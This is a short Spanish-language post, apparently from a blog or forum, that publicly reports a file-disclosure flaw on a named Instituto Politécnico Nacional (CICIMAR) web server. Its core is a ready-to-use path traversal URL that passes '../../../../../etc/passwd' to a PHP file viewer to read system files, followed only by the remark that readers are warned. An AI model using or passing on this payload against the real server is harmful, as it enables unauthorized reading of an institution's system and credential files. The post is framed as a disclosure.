Navegando me encontré con una vulnerabilidad en el sitio del Instituto Politécnico Nacional que permite obtener casi cualquier archivo del servidor usando la siguiente URL:
http://www.cicimar.ipn.mx/cicimar/publica/verarchivos.php?archivo=../../../../../etc/passwd
Están avisados.